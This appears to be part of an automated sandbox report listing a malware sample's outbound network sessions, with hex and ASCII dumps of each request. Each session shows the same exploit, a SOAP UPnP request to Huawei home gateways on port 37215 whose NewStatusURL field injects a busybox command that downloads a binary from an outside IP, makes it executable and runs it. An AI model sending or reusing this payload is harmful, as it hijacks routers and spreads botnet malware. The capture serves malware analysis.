                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              702192.168.2.155945094.96.170.12037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225610018 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              703192.168.2.1557830119.9.47.16237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225709915 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              704192.168.2.1541558102.221.43.10037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225711107 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              705192.168.2.1536872190.12.113.21137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225709915 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              706192.168.2.153953294.153.221.7337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225717068 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              707192.168.2.1540650190.48.77.21937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225763083 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              708192.168.2.153660437.62.155.437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225768089 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              709192.168.2.1555098138.234.194.3237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225789070 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              710192.168.2.1535730121.102.176.8537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225817919 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              711192.168.2.1534174156.125.230.20837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225868940 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
